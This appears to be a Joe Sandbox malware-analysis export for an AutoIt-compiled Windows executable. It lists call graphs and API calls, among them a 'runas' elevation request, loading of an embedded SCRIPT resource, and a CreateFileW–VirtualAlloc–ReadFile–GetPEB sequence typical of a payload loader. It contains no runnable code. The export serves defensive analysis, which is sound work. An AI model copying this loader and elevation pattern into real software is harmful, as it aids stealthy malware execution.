97341 748343 97341->97335 97349 750984 97341->97349 97348 748338 97342->97348 97352 738e0b 40 API calls 2 library calls 97342->97352 97344 74838c 97344->97348 97353 738e0b 40 API calls 2 library calls 97344->97353 97346 7483ab 97346->97348 97354 738e0b 40 API calls 2 library calls 97346->97354 97348->97341 97355 73f2d9 20 API calls __dosmaperr 97348->97355 97357 750081 97349->97357 97351 75099f 97351->97335 97352->97344 97353->97346 97354->97348 97355->97339 97356->97341 97359 75008d CallCatchBlock 97357->97359 97358 75009b 97415 73f2d9 20 API calls __dosmaperr 97358->97415 97359->97358 97361 7500d4 97359->97361 97368 75065b 97361->97368 97362 7500a0 97416 7427ec 26 API calls __wsopen_s 97362->97416 97367 7500aa __wsopen_s 97367->97351 97418 75042f 97368->97418 97371 7506a6 97436 745221 97371->97436 97372 75068d 97450 73f2c6 20 API calls __dosmaperr 97372->97450 97375 7506ab 97376 7506b4 97375->97376 97377 7506cb 97375->97377 97452 73f2c6 20 API calls __dosmaperr 97376->97452 97449 75039a CreateFileW 97377->97449 97381 750704 97383 750781 GetFileType 97381->97383 97385 750756 GetLastError 97381->97385 97454 75039a CreateFileW 97381->97454 97382 7506b9 97453 73f2d9 20 API calls __dosmaperr 97382->97453 97386 75078c GetLastError 97383->97386 97388 7507d3 97383->97388 97455 73f2a3 20 API calls __dosmaperr 97385->97455 97456 73f2a3 20 API calls __dosmaperr 97386->97456 97387 750692 97451 73f2d9 20 API calls __dosmaperr 97387->97451 97458 74516a 21 API calls 2 library calls 97388->97458 97392 75079a CloseHandle 97392->97387 97395 7507c3 97392->97395 97394 750749 97394->97383 97394->97385 97457 73f2d9 20 API calls __dosmaperr 97395->97457 97397 7507f4 97399 750840 97397->97399 97459 7505ab 72 API calls 3 library calls 97397->97459 97398 7507c8 97398->97387 97403 75086d 97399->97403 97460 75014d 72 API calls 4 library calls 97399->97460 97402 750866 97402->97403 97404 75087e 97402->97404 97405 7486ae __wsopen_s 29 API calls 97403->97405 97406 7500f8 97404->97406 97407 7508fc CloseHandle 97404->97407 97405->97406 97417 750121 LeaveCriticalSection __wsopen_s 97406->97417 97461 75039a CreateFileW 97407->97461 97409 750927 97410 750931 GetLastError 97409->97410 97411 75095d 97409->97411 97462 73f2a3 20 API calls __dosmaperr 97410->97462 97411->97406 97413 75093d 97463 745333 21 API calls 2 library calls 97413->97463 97415->97362 97416->97367 97417->97367 97419 75046a 97418->97419 97420 750450 97418->97420 97464 7503bf 97419->97464 97420->97419 97471 73f2d9 20 API calls __dosmaperr 97420->97471 97423 7504a2 97426 7504d1 97423->97426 97473 73f2d9 20 API calls __dosmaperr 97423->97473 97424 75045f 97472 7427ec 26 API calls __wsopen_s 97424->97472 97434 750524 97426->97434 97475 73d70d 26 API calls 2 library calls 97426->97475 97429 75051f 97431 75059e 97429->97431 97429->97434 97430 7504c6 97474 7427ec 26 API calls __wsopen_s 97430->97474 97476 7427fc 11 API calls _abort 97431->97476 97434->97371 97434->97372 97435 7505aa 97437 74522d CallCatchBlock 97436->97437 97479 742f5e EnterCriticalSection 97437->97479 97439 74527b 97480 74532a 97439->97480 97441 745234 97441->97439 97442 745259 97441->97442 97446 7452c7 EnterCriticalSection 97441->97446 97443 745000 __wsopen_s 21 API calls 97442->97443 97445 74525e 97443->97445 97444 7452a4 __wsopen_s 97444->97375 97445->97439 97483 745147 EnterCriticalSection 97445->97483 97446->97439 97448 7452d4 LeaveCriticalSection 97446->97448 97448->97441 97449->97381 97450->97387 97451->97406 97452->97382 97453->97387 97454->97394 97455->97387 97456->97392 97457->97398 97458->97397 97459->97399 97460->97402 97461->97409 97462->97413 97463->97411 97467 7503d7 97464->97467 97465 7503f2 97465->97423 97467->97465 97477 73f2d9 20 API calls __dosmaperr 97467->97477 97468 750416 97478 7427ec 26 API calls __wsopen_s 97468->97478 97470 750421 97470->97423 97471->97424 97472->97419 97473->97430 97474->97426 97475->97429 97476->97435 97477->97468 97478->97470 97479->97441 97484 742fa6 LeaveCriticalSection 97480->97484 97482 745331 97482->97444 97483->97439 97484->97482 97485 763a41 97489 7810c0 97485->97489 97487 763a4c 97488 7810c0 53 API calls 97487->97488 97488->97487 97490 7810fa 97489->97490 97495 7810cd 97489->97495 97490->97487 97491 7810fc 97501 72fa11 53 API calls 97491->97501 97493 781101 97494 717510 53 API calls 97493->97494 97496 781108 97494->97496 97495->97490 97495->97491 97495->97493 97498 7810f4 97495->97498 97497 716350 22 API calls 97496->97497 97497->97490 97500 71b270 39 API calls 97498->97500 97500->97490 97501->97493 97502 1321be8 97516 131f7f8 97502->97516 97504 1321cb8 97519 1321ad8 97504->97519 97506 1321ce1 CreateFileW 97508 1321d35 97506->97508 97515 1321d30 97506->97515 97509 1321d4c VirtualAlloc 97508->97509 97508->97515 97510 1321d6d ReadFile 97509->97510 97509->97515 97511 1321d88 97510->97511 97510->97515 97512 1320868 12 API calls 97511->97512 97513 1321da2 97512->97513 97514 1320ad8 GetPEB GetPEB 97513->97514 97514->97515 97522 1322cf8 GetPEB 97516->97522 97518 131fe83 97518->97504 97520 1321ae1 Sleep 97519->97520 97521 1321aef 97520->97521 97523 1322d22 97522->97523 97523->97518 97524 711cad SystemParametersInfoW

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 245 7142de-71434d call 71a961 GetVersionExW call 716b57 250 753617-75362a 245->250 251 714353 245->251 253 75362b-75362f 250->253 252 714355-714357 251->252 254 753656 252->254 255 71435d-7143bc call 7193b2 call 7137a0 252->255 256 753631 253->256 257 753632-75363e 253->257 261 75365d-753660 254->261 274 7143c2-7143c4 255->274 275 7537df-7537e6 255->275 256->257 257->253 259 753640-753642 257->259 259->252 260 753648-75364f 259->260 260->250 263 753651 260->263 264 753666-7536a8 261->264 265 71441b-714435 GetCurrentProcess IsWow64Process 261->265 263->254 264->265 269 7536ae-7536b1 264->269 267 714494-71449a 265->267 268 714437 265->268 271 71443d-714449 267->271 268->271 272 7536b3-7536bd 269->272 273 7536db-7536e5 269->273 276 753824-753828 GetSystemInfo 271->276 277 71444f-71445e LoadLibraryA 271->277 278 7536bf-7536c5 272->278 279 7536ca-7536d6 272->279 281 7536e7-7536f3 273->281 282 7536f8-753702 273->282 274->261 280 7143ca-7143dd 274->280 283 753806-753809 275->283 284 7537e8 275->284 287 714460-71446e GetProcAddress 277->287 288 71449c-7144a6 GetSystemInfo 277->288 278->265 279->265 289 7143e3-7143e5 280->289 290 753726-75372f 280->290 281->265 292 753715-753721 282->292 293 753704-753710 282->293 285 7537f4-7537fc 283->285 286 75380b-75381a 283->286 291 7537ee 284->291 285->283 286->291 296 75381c-753822 286->296 287->288 297 714470-714474 GetNativeSystemInfo 287->297 298 714476-714478 288->298 299 75374d-753762 289->299 300 7143eb-7143ee 289->300 294 753731-753737 290->294 295 75373c-753748 290->295 291->285 292->265 293->265 294->265 295->265 296->285 297->298 303 714481-714493 298->303 304 71447a-71447b FreeLibrary 298->304 301 753764-75376a 299->301 302 75376f-75377b 299->302 305 753791-753794 300->305 306 7143f4-71440f 300->306 301->265 302->265 304->303 305->265 307 75379a-7537c1 305->307 308 714415 306->308 309 753780-75378c 306->309 310 7537c3-7537c9 307->310 311 7537ce-7537da 307->311 308->265 309->265 310->265 311->265
                                                                APIs
                                                                • GetVersionExW.KERNEL32(?), ref: 0071430D
                                                                  • Part of subcall function 00716B57: _wcslen.LIBCMT ref: 00716B6A
                                                                • GetCurrentProcess.KERNEL32(?,007ACB64,00000000,?,?), ref: 00714422
                                                                • IsWow64Process.KERNEL32(00000000,?,?), ref: 00714429
                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00714454
                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00714466
                                                                • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00714474
                                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 0071447B
                                                                • GetSystemInfo.KERNEL32(?,?,?), ref: 007144A0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                • API String ID: 3290436268-3101561225
                                                                • Opcode ID: 8422e3c819b3fd66c7ef82bb10765c8cc169e645bb6c45aca133f72cb36812a9
                                                                • Instruction ID: 61a728e487382d2ffd26c9a8a2a6302f791fd2cd0d411c066b4e7bd40995fff8
                                                                • Opcode Fuzzy Hash: 8422e3c819b3fd66c7ef82bb10765c8cc169e645bb6c45aca133f72cb36812a9
                                                                • Instruction Fuzzy Hash: C2A1B57190B2C0DFC712C76DBCC35D97FA46B2E741B98C899D8419BA62D27C4948CB39

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1257 7142a2-7142ba CreateStreamOnHGlobal 1258 7142da-7142dd 1257->1258 1259 7142bc-7142d3 FindResourceExW 1257->1259 1260 7142d9 1259->1260 1261 7535ba-7535c9 LoadResource 1259->1261 1260->1258 1261->1260 1262 7535cf-7535dd SizeofResource 1261->1262 1262->1260 1263 7535e3-7535ee LockResource 1262->1263 1263->1260 1264 7535f4-753612 1263->1264 1264->1260
                                                                APIs
                                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,007150AA,?,?,00000000,00000000), ref: 007142B2
                                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,007150AA,?,?,00000000,00000000), ref: 007142C9
                                                                • LoadResource.KERNEL32(?,00000000,?,?,007150AA,?,?,00000000,00000000,?,?,?,?,?,?,00714F20), ref: 007535BE
                                                                • SizeofResource.KERNEL32(?,00000000,?,?,007150AA,?,?,00000000,00000000,?,?,?,?,?,?,00714F20), ref: 007535D3
                                                                • LockResource.KERNEL32(007150AA,?,?,007150AA,?,?,00000000,00000000,?,?,?,?,?,?,00714F20,?), ref: 007535E6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                • String ID: SCRIPT
                                                                • API String ID: 3051347437-3967369404
                                                                • Opcode ID: 6326701dea7b611c3745878353fef1de12f9c6246b7a54cb7ee9eadea9309db9
                                                                • Instruction ID: 078e415e3dcdb5a2318902a1cf8b8e1b4e08edb23d86cefa097389b90d852af8
                                                                • Opcode Fuzzy Hash: 6326701dea7b611c3745878353fef1de12f9c6246b7a54cb7ee9eadea9309db9
                                                                • Instruction Fuzzy Hash: 76118E71200700BFDB268B69DC49F677BBAFBC6B51F108169F402D62A0DB75DC409A30

                                                                Control-flow Graph

                                                                APIs
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00712B6B
                                                                  • Part of subcall function 00713A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007E1418,?,00712E7F,?,?,?,00000000), ref: 00713A78
                                                                  • Part of subcall function 00719CB3: _wcslen.LIBCMT ref: 00719CBD
                                                                • GetForegroundWindow.USER32(runas,?,?,?,?,?,007D2224), ref: 00752C10
                                                                • ShellExecuteW.SHELL32(00000000,?,?,007D2224), ref: 00752C17
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                • String ID: runas
                                                                • API String ID: 448630720-4000483414
                                                                • Opcode ID: a8ad35f73ee962baebf39cfdf69f1008b98271ae96176b1fba34c4bd6a9c6dd2
                                                                • Instruction ID: fdd33ec09103c1c2364a8ce8d37effc187918350f2a1411c69899f80e1b0251e
                                                                • Opcode Fuzzy Hash: a8ad35f73ee962baebf39cfdf69f1008b98271ae96176b1fba34c4bd6a9c6dd2
                                                                • Instruction Fuzzy Hash: 8C11D571208381EAC715FF68D85A9EDB7A49B96350F44442DB182061E3DF3C9A8B8712
                                                                APIs
                                                                • GetInputState.USER32 ref: 0071D807
                                                                • timeGetTime.WINMM ref: 0071DA07
                                                                • Sleep.KERNEL32(0000000A), ref: 0071DBB1
                                                                • Sleep.KERNEL32(0000000A), ref: 00762B76
                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00762C11
                                                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 00762C29
                                                                • CloseHandle.KERNEL32(?), ref: 00762C3D
                                                                • Sleep.KERNEL32(?,CCCCCCCC,00000000), ref: 00762CA9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Sleep$CloseCodeExitHandleInputObjectProcessSingleStateTimeWaittime
                                                                • String ID:
                                                                • API String ID: 388478766-0
                                                                • Opcode ID: 18920c330bdde8dee3e445c7206422d30d6bcc761d13a976cc78621ed172570a
                                                                • Instruction ID: f82fb1cb92721b5671b42632a80fcc0d51ac00dfe5b886877876f40a349a80b4
                                                                • Opcode Fuzzy Hash: 18920c330bdde8dee3e445c7206422d30d6bcc761d13a976cc78621ed172570a
                                                                • Instruction Fuzzy Hash: 0442D070608641EFD735CF28C888BAAB7A0BF85314F548519E8568B2D2D77CEC85CF92

                                                                Control-flow Graph

                                                                APIs
                                                                • GetSysColorBrush.USER32(0000000F), ref: 00712D07
                                                                • RegisterClassExW.USER32(00000030), ref: 00712D31
                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00712D42
                                                                • InitCommonControlsEx.COMCTL32(?), ref: 00712D5F
                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00712D6F
                                                                • LoadIconW.USER32(000000A9), ref: 00712D85
                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00712D94
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                • API String ID: 2914291525-1005189915
                                                                • Opcode ID: dfe6825f45f290bb68e5d778acd7217887d9ccbd652295985936790c9ed2f015
                                                                • Instruction ID: e1fe3b45651527b76380ed27353a5991d1fc725b37eff30921cbe47250dbdb5f
                                                                • Opcode Fuzzy Hash: dfe6825f45f290bb68e5d778acd7217887d9ccbd652295985936790c9ed2f015
                                                                • Instruction Fuzzy Hash: 9221F9B1902398EFDB01DF94EC89BDD7BB4FB49704F40811AF511AA290D7B95540CF58

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 313 75065b-75068b call 75042f 316 7506a6-7506b2 call 745221 313->316 317 75068d-750698 call 73f2c6 313->317 323 7506b4-7506c9 call 73f2c6 call 73f2d9 316->323 324 7506cb-750714 call 75039a 316->324 322 75069a-7506a1 call 73f2d9 317->322 333 75097d-750983 322->333 323->322 331 750716-75071f 324->331 332 750781-75078a GetFileType 324->332 335 750756-75077c GetLastError call 73f2a3 331->335 336 750721-750725 331->336 337 7507d3-7507d6 332->337 338 75078c-7507bd GetLastError call 73f2a3 CloseHandle 332->338 335->322 336->335 342 750727-750754 call 75039a 336->342 340 7507df-7507e5 337->340 341 7507d8-7507dd 337->341 338->322 352 7507c3-7507ce call 73f2d9 338->352 345 7507e9-750837 call 74516a 340->345 346 7507e7 340->346 341->345 342->332 342->335 356 750847-75086b call 75014d 345->356 357 750839-750845 call 7505ab 345->357 346->345 352->322 363 75086d 356->363 364 75087e-7508c1 356->364 357->356 362 75086f-750879 call 7486ae 357->362 362->333 363->362 366 7508c3-7508c7 364->366 367 7508e2-7508f0 364->367 366->367 369 7508c9-7508dd 366->369 370 7508f6-7508fa 367->370 371 75097b 367->371 369->367 370->371 372 7508fc-75092f CloseHandle call 75039a 370->372 371->333 375 750931-75095d GetLastError call 73f2a3 call 745333 372->375 376 750963-750977 372->376 375->376 376->371
                                                                APIs
                                                                  • Part of subcall function 0075039A: CreateFileW.KERNELBASE(00000000,00000000,?,00750704,?,?,00000000,?,00750704,00000000,0000000C), ref: 007503B7
                                                                • GetLastError.KERNEL32 ref: 0075076F
                                                                • __dosmaperr.LIBCMT ref: 00750776
                                                                • GetFileType.KERNELBASE(00000000), ref: 00750782
                                                                • GetLastError.KERNEL32 ref: 0075078C
                                                                • __dosmaperr.LIBCMT ref: 00750795
                                                                • CloseHandle.KERNEL32(00000000), ref: 007507B5
                                                                • CloseHandle.KERNEL32(?), ref: 007508FF
                                                                • GetLastError.KERNEL32 ref: 00750931
                                                                • __dosmaperr.LIBCMT ref: 00750938
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                • String ID: H
                                                                • API String ID: 4237864984-2852464175
                                                                • Opcode ID: 9c19d918f0722275fba9651391daa993402c04553b8ed26138bf1fce2925649d
                                                                • Instruction ID: 2756dfd9e64cdc3823c23120e3f72f3330ee844166fcfcb294bb197b23a930b7
                                                                • Opcode Fuzzy Hash: 9c19d918f0722275fba9651391daa993402c04553b8ed26138bf1fce2925649d
                                                                • Instruction Fuzzy Hash: E4A12532A001449FDF19AF68D895BEE3BA0EB4A321F14415DFC11DF292DB799816CBD1

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 00713A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007E1418,?,00712E7F,?,?,?,00000000), ref: 00713A78
                                                                  • Part of subcall function 00713357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00713379
                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0071356A
                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0075318D
                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007531CE
                                                                • RegCloseKey.ADVAPI32(?), ref: 00753210
                                                                • _wcslen.LIBCMT ref: 00753277
                                                                • _wcslen.LIBCMT ref: 00753286
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                • API String ID: 98802146-2727554177
                                                                • Opcode ID: 5080758a949c1714145d2958122d72d8d5b12f051fb161eca2a54610a645210e
                                                                • Instruction ID: 641b74626531812f7e281e842b2567130f5a6fa06b5443884013a9f87e0bde13
                                                                • Opcode Fuzzy Hash: 5080758a949c1714145d2958122d72d8d5b12f051fb161eca2a54610a645210e
                                                                • Instruction Fuzzy Hash: CD718D71405340AEC314DF29DC869ABBBE8FF89740F40452EF545871A2EB7C9A8ACF65

                                                                Control-flow Graph

                                                                APIs
                                                                • GetSysColorBrush.USER32(0000000F), ref: 00712B8E
                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00712B9D
                                                                • LoadIconW.USER32(00000063), ref: 00712BB3
                                                                • LoadIconW.USER32(000000A4), ref: 00712BC5
                                                                • LoadIconW.USER32(000000A2), ref: 00712BD7
                                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00712BEF
                                                                • RegisterClassExW.USER32(?), ref: 00712C40
                                                                  • Part of subcall function 00712CD4: GetSysColorBrush.USER32(0000000F), ref: 00712D07
                                                                  • Part of subcall function 00712CD4: RegisterClassExW.USER32(00000030), ref: 00712D31
                                                                  • Part of subcall function 00712CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00712D42
                                                                  • Part of subcall function 00712CD4: InitCommonControlsEx.COMCTL32(?), ref: 00712D5F
                                                                  • Part of subcall function 00712CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00712D6F
                                                                  • Part of subcall function 00712CD4: LoadIconW.USER32(000000A9), ref: 00712D85
                                                                  • Part of subcall function 00712CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00712D94
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                • String ID: #$0$AutoIt v3
                                                                • API String ID: 423443420-4155596026
                                                                • Opcode ID: 07bd633a6ddb6652be54ba343b786d814a85e4eaac00e7df9244790d5e58f00f
                                                                • Instruction ID: 4982dca1d4aa2946c6a60bc830685cc4544640f3969abe2ee9725dc15f8a5a3d
                                                                • Opcode Fuzzy Hash: 07bd633a6ddb6652be54ba343b786d814a85e4eaac00e7df9244790d5e58f00f
                                                                • Instruction Fuzzy Hash: F2213D70E02358AFDB119F95EC96A9D7FB4FB4CB50F40801AE500EA7A0D7B91540CF98
                                                                APIs
                                                                • __Init_thread_footer.LIBCMT ref: 0071BB4E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                                • Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_710000_9876567899.jbxd
                                                                Similarity
                                                                • API ID: Init_thread_footer
                                                                • String ID: p#~$p#~$p#~$p#~$p%~$p%~$x#~$x#~
                                                                • API String ID: 1385522511-3993589769
                                                                • Opcode ID: 0a107db5837bd8f23c46acd359f50b09785c35351754ca004c3552cef5171fdf
                                                                • Instruction ID: 89e136bec427604818833f11869aa4db7558e2c6158dfdc5454cde948fa105fc
                                                                • Opcode Fuzzy Hash: 0a107db5837bd8f23c46acd359f50b09785c35351754ca004c3552cef5171fdf
                                                                • Instruction Fuzzy Hash: 9A329074A04209DFDB24CF58C894ABEB7B9EF48314F148059ED06AB291D77CED82CB91

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
